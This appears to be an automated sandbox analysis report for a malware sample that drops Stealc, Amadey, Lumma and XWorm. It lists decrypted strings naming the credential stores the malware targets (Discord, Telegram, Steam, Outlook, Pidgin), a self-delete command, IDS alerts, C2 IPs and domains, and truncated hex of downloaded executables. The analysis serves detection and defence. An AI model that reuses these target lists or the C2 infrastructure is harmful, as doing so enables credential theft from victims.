Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: %APPDATA%
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: %USERPROFILE%
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: %DOCUMENTS%
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: %RECENT%
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: *.lnk
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: files
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: \discord\
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: \Telegram Desktop\
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: key_datas
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: map*
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Telegram
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Tox
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: *.tox
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: *.ini
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Password
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: 00000001
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: 00000002
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: 00000003
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: 00000004
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Pidgin
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: \.purple\
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: accounts.xml
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: token:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Software\Valve\Steam
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: SteamPath
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: \config\
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: ssfn*
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: config.vdf
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: DialogConfig.vdf
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: libraryfolders.vdf
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: loginusers.vdf
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: \Steam\
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: sqlite3.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: done
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: soft
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: https
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: POST
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: HTTP/1.1
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: hwid
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: build
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: token
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: file_name
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: file
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: message
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: screenshot.jpg
Source: 27.2.qk4EiZw.exe.1c0000.0.unpack	String decryptor: 112.213.116.149
Source: 27.2.qk4EiZw.exe.1c0000.0.unpack	String decryptor: 7000
Source: 27.2.qk4EiZw.exe.1c0000.0.unpack	String decryptor: <123456789>
Source: 27.2.qk4EiZw.exe.1c0000.0.unpack	String decryptor: <Xwormmm>
Source: 27.2.qk4EiZw.exe.1c0000.0.unpack	String decryptor: vuctum
Source: 27.2.qk4EiZw.exe.1c0000.0.unpack	String decryptor: USB.exe
Source: 27.2.qk4EiZw.exe.1c0000.0.unpack	String decryptor: %AppData%
Source: 27.2.qk4EiZw.exe.1c0000.0.unpack	String decryptor: msedge.exe

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CECA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6CECA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEC44C0 PK11_PubEncrypt,	0_2_6CEC44C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEC4440 PK11_PrivDecrypt,	0_2_6CEC4440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE94420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6CE94420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF125B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6CF125B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEAE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6CEAE6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEA8670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6CEA8670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CECA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6CECA650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEEA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6CEEA730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEF0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6CEF0180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEC43B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6CEC43B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEE7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6CEE7C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEA7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6CEA7D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEEBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6CEEBD30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEE9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6CEE9EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEC3FF0 PK11_PrivDecryptPKCS1,	0_2_6CEC3FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEC9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	0_2_6CEC9840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEC3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6CEC3850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEEDA40 SEC_PKCS7ContentIsEncrypted,	0_2_6CEEDA40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEF7410 NSS_SecureMemcmp,PR_SetError,PK11_Decrypt,	0_2_6CEF7410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEC3560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6CEC3560

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.7:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.7:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.7:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.7:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.7:49954 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.7:50005 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1903696304.000000007013D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1903696304.000000007013D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49701 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.7:49701 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.7:49701
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.7:49701 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.7:49701
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.7:49701 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:49904 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49932 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.7:55337 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49953 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.7:49954 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.7:49966 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.7:49913
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 112.213.116.149:7000 -> 192.168.2.7:49946
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49946 -> 112.213.116.149:7000
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49991 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49987 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.7:50005 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49946 -> 112.213.116.149:7000
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49954 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49954 -> 104.21.16.9:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: print-vexer.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: atten-supporse.biz
Source: Malware configuration extractor	URLs: 112.213.116.149
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: global traffic

TCP traffic: 192.168.2.7:49946 -> 112.213.116.149:7000

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 11:59:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 11:59:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 